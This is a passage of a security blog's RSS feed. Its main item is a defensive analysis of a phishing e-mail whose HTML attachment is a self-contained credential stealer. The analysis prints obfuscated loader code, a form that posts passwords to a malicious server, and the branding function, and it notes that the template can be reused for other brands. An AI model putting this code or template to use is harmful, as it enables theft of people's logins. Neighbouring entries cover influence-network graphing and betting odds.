&lt;li&gt;Identification of friendly &lt;a href=&quot;https://github.com/cogsec-collaborative/AMITT/blob/main/techniques/T0039.md&quot;&gt;influencers&lt;/a&gt; who may also be targeted.&lt;/li&gt;
&lt;li&gt;Identification of fault lines between communities can help develop counter narratives that are &lt;a href=&quot;https://github.com/cogsec-collaborative/AMITT/blob/main/counters/C00111.md&quot;&gt;sympathetic&lt;/a&gt; to opposing forces.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Issues and Hints&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Neo4j can only display a limited number of nodes and relationships. Filtering nodes by a minimum number of relationships will help display useful information.&lt;/li&gt;
&lt;li&gt;The codebase conducts coreference as well as pairing mathematically similar words and phrases but there will still be problems where there are multiple nodes for a single entity (James, Jim, Jimmy, James Johnson), manual correction may be required.&lt;/li&gt;
&lt;li&gt;Occasionally where a website renders an error, or something else unusual, the text will be processed by the program and included as nodes which will need to be removed.&lt;/li&gt;
&lt;li&gt;The more obscure a relationship you try to extract, the less successful your project will be. I have had success using “linked”, “associates” and “interacts” but more complex relationships like “shareholder” or “beneficial owner” are less succesful.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Example&lt;/h2&gt;
&lt;p&gt;The recent 2021 Gambia election wasn’t a subject that I was particularly knowledgeable about but the underlying graph data for the below chart was scraped and analysed from 25 news articles in less than half an hour. The chart shows nodes with more than 2 connections and the annotations were manually added. Whilst not groundbreaking, the chart is hopefully demonstrative of what could de done with more data and supplemented with manual analysis.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/8cd75889fa399ba00a54ccbe7be8ecd5/095fc/gambian_election.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 122.2972972972973%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAYABQDASIAAhEBAxEB/8QAGAABAQEBAQAAAAAAAAAAAAAAAAMCBAX/xAAVAQEBAAAAAAAAAAAAAAAAAAAAAf/aAAwDAQACEAMQAAAB97mvKLMFpksyD//EABoQAAMAAwEAAAAAAAAAAAAAAAABERASISL/2gAIAQEAAQUCbht7TIiduGNH/8QAFxEBAQEBAAAAAAAAAAAAAAAAEQABEP/aAAgBAwEBPwEY3hf/xAAWEQADAAAAAAAAAAAAAAAAAAAAEBH/2gAIAQIBAT8BdP/EABQQAQAAAAAAAAAAAAAAAAAAADD/2gAIAQEABj8CH//EABgQAAMBAQAAAAAAAAAAAAAAAAABETEh/9oACAEBAAE/IUCNoqshbXWOGORKUgu9P//aAAwDAQACAAMAAAAQiO89/8QAFxEBAQEBAAAAAAAAAAAAAAAAAQAQEf/aAAgBAwEBPxAUMub/xAAXEQADAQAAAAAAAAAAAAAAAAAAAREQ/9oACAECAQE/EGXKP//EAB4QAQEAAgICAwAAAAAAAAAAAAERACExQVFhgbHB/9oACAEBAAE/EAK11dYvSEdI41nkSOaJIIt9T9wTsI07+XLIaSaYv0ZQvLgo0U5O5cG98eM//9k=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Gambia Election&quot;
        title=&quot;Gambia Election&quot;
        src=&quot;/static/8cd75889fa399ba00a54ccbe7be8ecd5/1c72d/gambian_election.jpg&quot;
        srcset=&quot;/static/8cd75889fa399ba00a54ccbe7be8ecd5/a80bd/gambian_election.jpg 148w,
/static/8cd75889fa399ba00a54ccbe7be8ecd5/1c91a/gambian_election.jpg 295w,
/static/8cd75889fa399ba00a54ccbe7be8ecd5/1c72d/gambian_election.jpg 590w,
/static/8cd75889fa399ba00a54ccbe7be8ecd5/a8a14/gambian_election.jpg 885w,
/static/8cd75889fa399ba00a54ccbe7be8ecd5/095fc/gambian_election.jpg 1134w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Examination of a self-contained credential stealer]]></title><description><![CDATA[Phishing e-mails which are designed to steal credentials often depend on a user clicking a malicious link. The link then usually navigates…]]></description><link>https://dfworks.com/blog/credential_stealer/</link><guid isPermaLink="false">https://dfworks.com/blog/credential_stealer/</guid><pubDate>Sun, 03 May 2020 12:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Phishing e-mails which are designed to steal credentials often depend on a user clicking a malicious link. The link then usually navigates to a website that mimics a login page for a valid service or web application. A phishing email that I received this week took a slightly different approach as the credential theft occurred in a self-contained html file rather than using a remote website.&lt;/p&gt;
&lt;p&gt;This attack methodology isn’t new but alongside some other obfuscation tactics I thought it warranted a write-up so other organisations and internet users can be better prepared for identifying a similar attack.&lt;/p&gt;
&lt;h2&gt;The email&lt;/h2&gt;
&lt;p&gt;The email we received had no body, only an html attachment posing as an excel document…&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;csriskmanagement-997072_xls.html&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;…and the subject line&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Overdué invoicé - TransPérfect - Invoicé&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/8c45dd4b21e3cb60913a18a4dc232ef1/6a068/email.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 41.21621621621622%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAIABQDASIAAhEBAxEB/8QAFgABAQEAAAAAAAAAAAAAAAAAAAEF/8QAFAEBAAAAAAAAAAAAAAAAAAAAAP/aAAwDAQACEAMQAAAB26AH/8QAFxAAAwEAAAAAAAAAAAAAAAAAAAERIf/aAAgBAQABBQLCoqP/xAAUEQEAAAAAAAAAAAAAAAAAAAAQ/9oACAEDAQE/AT//xAAUEQEAAAAAAAAAAAAAAAAAAAAQ/9oACAECAQE/AT//xAAWEAEBAQAAAAAAAAAAAAAAAAAAMQH/2gAIAQEABj8CuKr/xAAYEAADAQEAAAAAAAAAAAAAAAAAIWEBkf/aAAgBAQABPyHEZRdIj//aAAwDAQACAAMAAAAQc8//xAAUEQEAAAAAAAAAAAAAAAAAAAAQ/9oACAEDAQE/ED//xAAUEQEAAAAAAAAAAAAAAAAAAAAQ/9oACAECAQE/ED//xAAXEAEBAQEAAAAAAAAAAAAAAAABAPFR/9oACAEBAAE/EGAM6iWKtcv/2Q==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Email&quot;
        title=&quot;Email&quot;
        src=&quot;/static/8c45dd4b21e3cb60913a18a4dc232ef1/1c72d/email.jpg&quot;
        srcset=&quot;/static/8c45dd4b21e3cb60913a18a4dc232ef1/a80bd/email.jpg 148w,
/static/8c45dd4b21e3cb60913a18a4dc232ef1/1c91a/email.jpg 295w,
/static/8c45dd4b21e3cb60913a18a4dc232ef1/1c72d/email.jpg 590w,
/static/8c45dd4b21e3cb60913a18a4dc232ef1/a8a14/email.jpg 885w,
/static/8c45dd4b21e3cb60913a18a4dc232ef1/6a068/email.jpg 960w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The first thing to note about this phishing email is the use of the accented é in the subject line as a way to circumvent mail filters that use keywords such as “Overdue” and “Invoice” to prevent phishing emails from landing in user inboxes. This is a fairly crude and easy to notice tactic and most of the mailboxes we tested correctly labelled this email as spam. However, there were exceptions so it is important to check that homoglyphs and unusual character variations are included in any keyword filtering.&lt;/p&gt;
&lt;p&gt;There wasn’t much more to glean from the email but an analysis of the sender domain and email headers suggest that the email was sent from a compromised mailbox in Estonia.&lt;/p&gt;
&lt;p&gt;TransPerfect has been common subject matter within phishing emails over the past few years. They suffered a data breach in 2017 when employee information was compromised in a phishing attack.&lt;/p&gt;
&lt;h2&gt;The Html Attachment&lt;/h2&gt;
&lt;p&gt;On opening the file in a text editor, there were two sections of JavaScript which looked suspicious.&lt;/p&gt;
&lt;h3&gt;Section 1&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;var vsebz=[876 charachter alphanumeric string];
document.write(atob(unescape(vsebz)));&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If it is not apparent what is occurring in this section, vsebz is a long-ish, twice obfuscated string, which is then rendered by your browser after it has been decoded within the document.write() method.&lt;/p&gt;
&lt;p&gt;In this instance it is fairly easy to decode the string; once using a base64 decoder and then a subsequent XML decoder. The resulting unobfuscated string points to a snippet of further code hosted at yourjavascript.com&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;http://yourjavascript.com/[11 character numeric string]/[9 character numeric string].js&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This link contained further obfuscated JavaScript revealing two further document.write() methods. One method downloaded an image hosted by the attacker on imgbb and the other pointed to a separate yourjavascript.com page which contained the html that is rendered should we have have opened the attachment on our desktop.&lt;/p&gt;
&lt;p&gt;Interestingly, the image may reveal some information about the attacker as it appears to be a screenshot taken from the attackers desktop. The foreground is a blurred spreadsheet designed to encourage a victim to insert credentials as you will see in the complete screenshot below. The excel user appears to be an individual called “Moshe”, which matches the initial in the outlook client in the background. At the very bottom of the image there is also evidence of correspondence with another user, “Lea”. Manual OSINT didn’t uncover anything helpful but perhaps developing a tool to scour social media for relationships between those two forenames could give you a shortlist of potential threat actors.&lt;/p&gt;
&lt;p&gt;The image was reported to imgbb and taken down shortly after. This resulted in an “image not found” background in the browser when the attachment was opened.  Hopefully this has made the attack easily identifiable as phishing for users who have a similar email lying in their inbox.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/bb0af62c9919d8e3476ff0ade724c0bd/f3712/screenshot.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 51.35135135135135%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAKABQDASIAAhEBAxEB/8QAGAAAAwEBAAAAAAAAAAAAAAAAAAECAwT/xAAVAQEBAAAAAAAAAAAAAAAAAAAAAf/aAAwDAQACEAMQAAAB5aSjQgr/xAAZEAABBQAAAAAAAAAAAAAAAAAQAAERITH/2gAIAQEAAQUCgUmwf//EABQRAQAAAAAAAAAAAAAAAAAAABD/2gAIAQMBAT8BP//EABQRAQAAAAAAAAAAAAAAAAAAABD/2gAIAQIBAT8BP//EABgQAAIDAAAAAAAAAAAAAAAAAAAQAREx/9oACAEBAAY/Allkv//EABoQAQADAAMAAAAAAAAAAAAAAAEAETEQIaH/2gAIAQEAAT8hBWErCuiFdMeThn//2gAMAwEAAgADAAAAEIsP/8QAFREBAQAAAAAAAAAAAAAAAAAAEBH/2gAIAQMBAT8Qh//EABQRAQAAAAAAAAAAAAAAAAAAABD/2gAIAQIBAT8QP//EABwQAQADAAIDAAAAAAAAAAAAAAEAESFBUTGx0f/aAAgBAQABPxCm5q5ZSkFmHUQ0t3deok0d+ILmsTfln//Z&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Screenshot&quot;
        title=&quot;Screenshot&quot;
        src=&quot;/static/bb0af62c9919d8e3476ff0ade724c0bd/1c72d/screenshot.jpg&quot;
        srcset=&quot;/static/bb0af62c9919d8e3476ff0ade724c0bd/a80bd/screenshot.jpg 148w,
/static/bb0af62c9919d8e3476ff0ade724c0bd/1c91a/screenshot.jpg 295w,
/static/bb0af62c9919d8e3476ff0ade724c0bd/1c72d/screenshot.jpg 590w,
/static/bb0af62c9919d8e3476ff0ade724c0bd/f3712/screenshot.jpg 744w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;An analysis of the accompanying html on the second yourjavascript.com page shows that when myFunction() is executed there is an http post request made to a malicious server. There is a form within the html with a placeholder for a password which is sent to the server when the user submits the information. As of 17/11/2020 VirusTotal flags the URL as both phishing and malware using the CyRadar, Fortinet, Sophia and Kapersky engines.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;... onload=&amp;quot;myFunction()&amp;quot; ...
... action=&amp;quot;http://www.tanikawashuntaro.com//cgi-bin/[alphanumeric string]/[alphanumeric string].php?[alphanumeric string]&amp;quot; method=&amp;quot;post&amp;quot; enctype=&amp;quot;multipart/form-data&amp;quot; ...&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;myFunction() is defined in section 2 of the original csriskmanagement-997072_xls.htmlfile.&lt;/p&gt;
&lt;h3&gt;Section 2&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;function myFunction() {
var ml = [base64 encoded string];
var logi = [base64 encoded string];
var ulb= atob(logi);
var go = atob(ml);
document.getElementById(&amp;#39;mypic&amp;#39;).setAttribute(&amp;#39;src&amp;#39;,ulb)
document.getElementById(&amp;quot;myText&amp;quot;).innerHTML = go;
document.getElementById(&amp;#39;myvalue&amp;#39;).value = go;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;myFunction() is primarily used to brand the form and capture credentials that are typed into the form mentioned in section 1. You can see the full rendering of the form and the background image below.&lt;/p&gt;
&lt;p&gt;Within this function there is also further obfuscation of JavaScript variables. The ml variable in this instance is the string “info@csriskmanagement.co.uk”. The logi variable is slightly more interesting as it abuses a legitimate marketing API from clearbit.com. The API can retrieve a company logo from a company domain which is intended to be used as a marketing tool.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;https://logo.clearbit.com/csriskmanagement.co.uk&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Using the above template a malicious attacker could create many branded, self-contained credential stealers by only changing a domain variable. A fully rendered image of the CS Risk Management credential stealer is below.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/3e153d35051f9e74a1487ed6a1c78f9a/a65aa/logo.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 45.27027027027027%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAJABQDASIAAhEBAxEB/8QAGAAAAwEBAAAAAAAAAAAAAAAAAAEEAgP/xAAVAQEBAAAAAAAAAAAAAAAAAAAAAf/aAAwDAQACEAMQAAAB4VwuNiK//8QAGBAAAwEBAAAAAAAAAAAAAAAAAQIDEiD/2gAIAQEAAQUCUDVkko4//8QAFBEBAAAAAAAAAAAAAAAAAAAAEP/aAAgBAwEBPwE//8QAFBEBAAAAAAAAAAAAAAAAAAAAEP/aAAgBAgEBPwE//8QAGRAAAQUAAAAAAAAAAAAAAAAAAQAREiAx/9oACAEBAAY/Ag6ENr//xAAYEAEBAQEBAAAAAAAAAAAAAAABERAAUf/aAAgBAQABPyFAAil5KY17dM//2gAMAwEAAgADAAAAEAjP/8QAFREBAQAAAAAAAAAAAAAAAAAAEBH/2gAIAQMBAT8Qh//EABURAQEAAAAAAAAAAAAAAAAAABAR/9oACAECAQE/EKf/xAAaEAEAAwEBAQAAAAAAAAAAAAABABEhMRBB/9oACAEBAAE/EB1SklZezNFrRxTMPqx7Ojz/2Q==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Logo&quot;
        title=&quot;Logo&quot;
        src=&quot;/static/3e153d35051f9e74a1487ed6a1c78f9a/1c72d/logo.jpg&quot;
        srcset=&quot;/static/3e153d35051f9e74a1487ed6a1c78f9a/a80bd/logo.jpg 148w,
/static/3e153d35051f9e74a1487ed6a1c78f9a/1c91a/logo.jpg 295w,
/static/3e153d35051f9e74a1487ed6a1c78f9a/1c72d/logo.jpg 590w,
/static/3e153d35051f9e74a1487ed6a1c78f9a/a8a14/logo.jpg 885w,
/static/3e153d35051f9e74a1487ed6a1c78f9a/a65aa/logo.jpg 1048w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;We informed Clearbit of our findings and recommended that the API should require authentication and also have appropriate rate limiting in place to help prevent abuses. Future monitoring of accounts was also recommended so that Clearbit could identify accounts which may be abusing their service for nefarious purposes.&lt;/p&gt;
&lt;p&gt;This may help Clearbit’s API from being abused by malicious attackers but it is unlikely that the security community will be able to prevent the programmatic capture of company logos. Appropriate security training that highlights social engineering tactics is the best defence once an email has bypassed any technical protection.&lt;/p&gt;
&lt;h2&gt;Reccomendations&lt;/h2&gt;
&lt;p&gt;This report isn’t a new attack but highlights some security tips which we can all implement if we aren’t doing so already.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Ensure your mail filtering solution is capable of handling homoglyphs&lt;/li&gt;
&lt;li&gt;Be wary of file extensions when viewing attachments&lt;/li&gt;
&lt;li&gt;Consider attachment types allowed to be received by e-mail and restrict if not required by the business&lt;/li&gt;
&lt;li&gt;Be mindful of sharing screenshots and video, sensitive information may be visible in the background&lt;/li&gt;
&lt;li&gt;If your organisation hosts an unauthenticated API or service then ensure you conduct routine audits to check for abuse&lt;/li&gt;
&lt;li&gt;Conduct routine security awareness training&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Mike Tyson and Machine Learning]]></title><description><![CDATA[Machine Learning in Bookmaking Bookmakers have been using machine learning to manage their risks and set odds for sporting events but they…]]></description><link>https://dfworks.com/blog/mike_tyson_machine_learning/</link><guid isPermaLink="false">https://dfworks.com/blog/mike_tyson_machine_learning/</guid><pubDate>Sun, 20 Jan 2019 12:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Machine Learning in Bookmaking&lt;/h2&gt;
&lt;p&gt;Bookmakers have been using machine learning to manage their risks and set odds for sporting events but they have far more factors to consider than their customers. Bookmakers have to set their prices based not only on the probable outcome of a sporting event but also in reaction to how much money is being placed across a range of different bets as well as pricing competitively relative to other bookmakers.&lt;/p&gt;
&lt;p&gt;Often these decisions have to be made incredibly quickly. With the increased use of automation this can often be comparable to other types of financial trading. An interesting example of how quick bookmakers react to changes in market conditions was observed when I received an (incorrect!) tip on the next Crystal Palace F.C. Manager. In June 2017, after Sam Allardyce’s departure, the odds on Slaviša Jokanović to get the position were 33/1.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/ace8ff7bc0e23cb9a1ad84c26b39dfd5/47311/slavisa.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 62.16216216216216%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAMABQDASIAAhEBAxEB/8QAFwABAAMAAAAAAAAAAAAAAAAAAAECBf/EABQBAQAAAAAAAAAAAAAAAAAAAAD/2gAMAwEAAhADEAAAAduwED//xAAXEAADAQAAAAAAAAAAAAAAAAAAEBFB/9oACAEBAAEFAtVKv//EABQRAQAAAAAAAAAAAAAAAAAAABD/2gAIAQMBAT8BP//EABQRAQAAAAAAAAAAAAAAAAAAABD/2gAIAQIBAT8BP//EABYQAAMAAAAAAAAAAAAAAAAAAAAgMf/aAAgBAQAGPwIq/wD/xAAaEAACAgMAAAAAAAAAAAAAAAAAARExEFFx/9oACAEBAAE/IYeyXRVFh5Gz/9oADAMBAAIAAwAAABCAD//EABQRAQAAAAAAAAAAAAAAAAAAABD/2gAIAQMBAT8QP//EABQRAQAAAAAAAAAAAAAAAAAAABD/2gAIAQIBAT8QP//EABsQAQADAQADAAAAAAAAAAAAAAEAETEhQVGR/9oACAEBAAE/EFdUTuPk5QssXssULbWwQGS3oir4n//Z&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Slavisa&quot;
        title=&quot;Slavisa&quot;
        src=&quot;/static/ace8ff7bc0e23cb9a1ad84c26b39dfd5/1c72d/slavisa.jpg&quot;
        srcset=&quot;/static/ace8ff7bc0e23cb9a1ad84c26b39dfd5/a80bd/slavisa.jpg 148w,
/static/ace8ff7bc0e23cb9a1ad84c26b39dfd5/1c91a/slavisa.jpg 295w,
/static/ace8ff7bc0e23cb9a1ad84c26b39dfd5/1c72d/slavisa.jpg 590w,
/static/ace8ff7bc0e23cb9a1ad84c26b39dfd5/a8a14/slavisa.jpg 885w,
/static/ace8ff7bc0e23cb9a1ad84c26b39dfd5/47311/slavisa.jpg 1080w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Because this was a relatively low volume market, a dozen bets from a handful of people caused the odds to drop to 9/1 in the space of about 30 minutes.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/ab2bc3d84c5a88fe34ae65c71d641781/47311/odds.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 47.972972972972975%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAKABQDASIAAhEBAxEB/8QAFwAAAwEAAAAAAAAAAAAAAAAAAAEFAv/EABUBAQEAAAAAAAAAAAAAAAAAAAAC/9oADAMBAAIQAxAAAAHbtK5jFsP/xAAYEAADAQEAAAAAAAAAAAAAAAAAARQCIP/aAAgBAQABBQKRkTZFrj//xAAWEQADAAAAAAAAAAAAAAAAAAAAARL/2gAIAQMBAT8BlEo//8QAFhEAAwAAAAAAAAAAAAAAAAAAAAIT/9oACAECAQE/AaMUY//EABkQAAMAAwAAAAAAAAAAAAAAAAABMgIgkf/aAAgBAQAGPwK8S0Wuaf/EABsQAAICAwEAAAAAAAAAAAAAAAABIVEQEZFB/9oACAEBAAE/IYp4Hi4jBNKkaVY//9oADAMBAAIAAwAAABCLL//EABQRAQAAAAAAAAAAAAAAAAAAABD/2gAIAQMBAT8QC//EABURAQEAAAAAAAAAAAAAAAAAAABh/9oACAECAQE/EKKP/8QAHxABAAIBAwUAAAAAAAAAAAAAAQARIRAxUXGRocHh/9oACAEBAAE/EMADZd2z5hwPvSfcU5PoifGRIwO2n//Z&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Odds&quot;
        title=&quot;Odds&quot;
        src=&quot;/static/ab2bc3d84c5a88fe34ae65c71d641781/1c72d/odds.jpg&quot;
        srcset=&quot;/static/ab2bc3d84c5a88fe34ae65c71d641781/a80bd/odds.jpg 148w,
/static/ab2bc3d84c5a88fe34ae65c71d641781/1c91a/odds.jpg 295w,
/static/ab2bc3d84c5a88fe34ae65c71d641781/1c72d/odds.jpg 590w,
/static/ab2bc3d84c5a88fe34ae65c71d641781/a8a14/odds.jpg 885w,
/static/ab2bc3d84c5a88fe34ae65c71d641781/47311/odds.jpg 1080w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Interestingly, betting sites where no bets were placed responded by adjusting their prices on that market, while others didn’t respond at all. This is demonstrable of some bookmakers adjusting prices based on customer sentiment and competitors rather than factors that are causal in the outcome of a sporting event. This is a necessity for bookmakers, bets on Jokanović were a liability which wasn’t balanced on their book. The twittersphere also noticed the tumble in price!&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
